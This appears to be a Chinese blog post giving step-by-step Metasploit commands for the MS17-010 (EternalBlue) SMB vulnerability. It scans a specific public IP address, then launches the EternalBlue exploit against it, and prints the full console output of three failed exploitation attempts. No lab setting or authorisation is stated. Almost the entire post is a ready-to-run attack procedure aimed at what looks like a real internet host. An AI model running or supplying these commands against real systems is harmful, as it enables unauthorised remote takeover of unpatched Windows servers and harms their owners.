zoukankan      html  css  js  c++  java

  • ms17-010渗透测试操作步骤

    使用的命令

    search ms17-010
use auxiliary/scanner/smb/smb_ms17_010
show options
set RHOSTS 47.92.84.135
run
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 47.92.84.135
exploit

    详情

    msf5 > search ms17-010

    Matching Modules

    ================

    # Name Disclosure Date Rank Check Description

    - ---- --------------- ---- ----- -----------

    0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution

    1 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection

    2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

    3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+

    4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

    msf5 > use auxiliary/scanner/smb/smb_ms17_010

    msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

    Module options (auxiliary/scanner/smb/smb_ms17_010):

    Name Current Setting Required Description

    CHECK_ARCH true no Check for architecture on vulnerable hosts

    CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts

    CHECK_PIPE false no Check for named pipe on vulnerable hosts

    NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check

    RHOSTS yes The target address range or CIDR identifier

    RPORT 445 yes The SMB service port (TCP)

    SMBDomain . no The Windows domain to use for authentication

    SMBPass no The password for the specified username

    SMBUser no The username to authenticate as

    THREADS 1 yes The number of concurrent threads

    msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 47.92.84.135

    RHOSTS => 47.92.84.135

    msf5 auxiliary(scanner/smb/smb_ms17_010) > run

    [+] 47.92.84.135:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1

    [*] 47.92.84.135:445 - Scanned 1 of 1 hosts (100% complete)

    [*] Auxiliary module execution completed

    msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue

    msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

    Module options (exploit/windows/smb/ms17_010_eternalblue):

    Name Current Setting Required Description

    RHOSTS yes The target address range or CIDR identifier

    RPORT 445 yes The target port (TCP)

    SMBDomain . no (Optional) The Windows domain to use for authentication

    SMBPass no (Optional) The password for the specified username

    SMBUser no (Optional) The username to authenticate as

    VERIFY_ARCH true yes Check if remote architecture matches exploit Target.

    VERIFY_TARGET true yes Check if remote OS matches exploit Target.

    Exploit target:

    Id Name

    0 Windows 7 and Server 2008 R2 (x64) All Service Packs

    msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 47.92.84.135

    RHOSTS => 47.92.84.135

    msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

    [*] Started reverse TCP handler on 172.17.0.2:4444

    [+] 47.92.84.135:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1

    [*] 47.92.84.135:445 - Connecting to target for exploitation.

    [+] 47.92.84.135:445 - Connection established for exploitation.

    [+] 47.92.84.135:445 - Target OS selected valid for OS indicated by SMB reply

    [*] 47.92.84.135:445 - CORE raw buffer dump (53 bytes)

    [*] 47.92.84.135:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2

    [*] 47.92.84.135:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris

    [*] 47.92.84.135:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P

    [*] 47.92.84.135:445 - 0x00000030 61 63 6b 20 31 ack 1

    [+] 47.92.84.135:445 - Target arch selected valid for arch indicated by DCE/RPC reply

    [*] 47.92.84.135:445 - Trying exploit with 12 Groom Allocations.

    [*] 47.92.84.135:445 - Sending all but last fragment of exploit packet

    [*] 47.92.84.135:445 - Starting non-paged pool grooming

    [+] 47.92.84.135:445 - Sending SMBv2 buffers

    [+] 47.92.84.135:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

    [*] 47.92.84.135:445 - Sending final SMBv2 buffers.

    [*] 47.92.84.135:445 - Sending last fragment of exploit packet!

    [*] 47.92.84.135:445 - Receiving response from exploit packet

    [+] 47.92.84.135:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!

    [*] 47.92.84.135:445 - Sending egg to corrupted connection.

    [*] 47.92.84.135:445 - Triggering free of corrupted buffer.

    [-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

    [-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

    [-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

    [*] 47.92.84.135:445 - Connecting to target for exploitation.

    [+] 47.92.84.135:445 - Connection established for exploitation.

    [+] 47.92.84.135:445 - Target OS selected valid for OS indicated by SMB reply

    [*] 47.92.84.135:445 - CORE raw buffer dump (53 bytes)

    [*] 47.92.84.135:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2

    [*] 47.92.84.135:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris

    [*] 47.92.84.135:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P

    [*] 47.92.84.135:445 - 0x00000030 61 63 6b 20 31 ack 1

    [+] 47.92.84.135:445 - Target arch selected valid for arch indicated by DCE/RPC reply

    [*] 47.92.84.135:445 - Trying exploit with 17 Groom Allocations.

    [*] 47.92.84.135:445 - Sending all but last fragment of exploit packet

    [*] 47.92.84.135:445 - Starting non-paged pool grooming

    [+] 47.92.84.135:445 - Sending SMBv2 buffers

    [+] 47.92.84.135:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

    [*] 47.92.84.135:445 - Sending final SMBv2 buffers.

    [*] 47.92.84.135:445 - Sending last fragment of exploit packet!

    [*] 47.92.84.135:445 - Receiving response from exploit packet

    [+] 47.92.84.135:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!

    [*] 47.92.84.135:445 - Sending egg to corrupted connection.

    [*] 47.92.84.135:445 - Triggering free of corrupted buffer.

    [-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

    [-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

    [-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

    [*] 47.92.84.135:445 - Connecting to target for exploitation.

    [+] 47.92.84.135:445 - Connection established for exploitation.

    [+] 47.92.84.135:445 - Target OS selected valid for OS indicated by SMB reply

    [*] 47.92.84.135:445 - CORE raw buffer dump (53 bytes)

    [*] 47.92.84.135:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2

    [*] 47.92.84.135:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris

    [*] 47.92.84.135:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P

    [*] 47.92.84.135:445 - 0x00000030 61 63 6b 20 31 ack 1

    [+] 47.92.84.135:445 - Target arch selected valid for arch indicated by DCE/RPC reply

    [*] 47.92.84.135:445 - Trying exploit with 22 Groom Allocations.

    [*] 47.92.84.135:445 - Sending all but last fragment of exploit packet

    [*] 47.92.84.135:445 - Starting non-paged pool grooming

    [+] 47.92.84.135:445 - Sending SMBv2 buffers

    [+] 47.92.84.135:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

    [*] 47.92.84.135:445 - Sending final SMBv2 buffers.

    [*] 47.92.84.135:445 - Sending last fragment of exploit packet!

    [*] 47.92.84.135:445 - Receiving response from exploit packet

    [+] 47.92.84.135:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!

    [*] 47.92.84.135:445 - Sending egg to corrupted connection.

    [*] 47.92.84.135:445 - Triggering free of corrupted buffer.

    [-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

    [-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

    [-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

    [*] Exploit completed, but no session was created.

    msf5 exploit(windows/smb/ms17_010_eternalblue) >
  • 相关阅读:
    指针
    基本数据类型和string类型的转换
    golang的数据类型之基本数据类型的默认值和转换
    golang的数据类型之字符串类型
    golang的数据类型之布尔类型
    windows pyspider WEB显示框太小解决方法
    MYSQL的全局变量和会话变量
    php 日期计算 总结
    使用 PHPMailer 发送邮件
    MySQL两种表存储结构MyISAM和InnoDB的性能比较测试
  • 原文地址:https://www.cnblogs.com/liuhuan086/p/13068752.html
Copyright © 2011-2022 走看看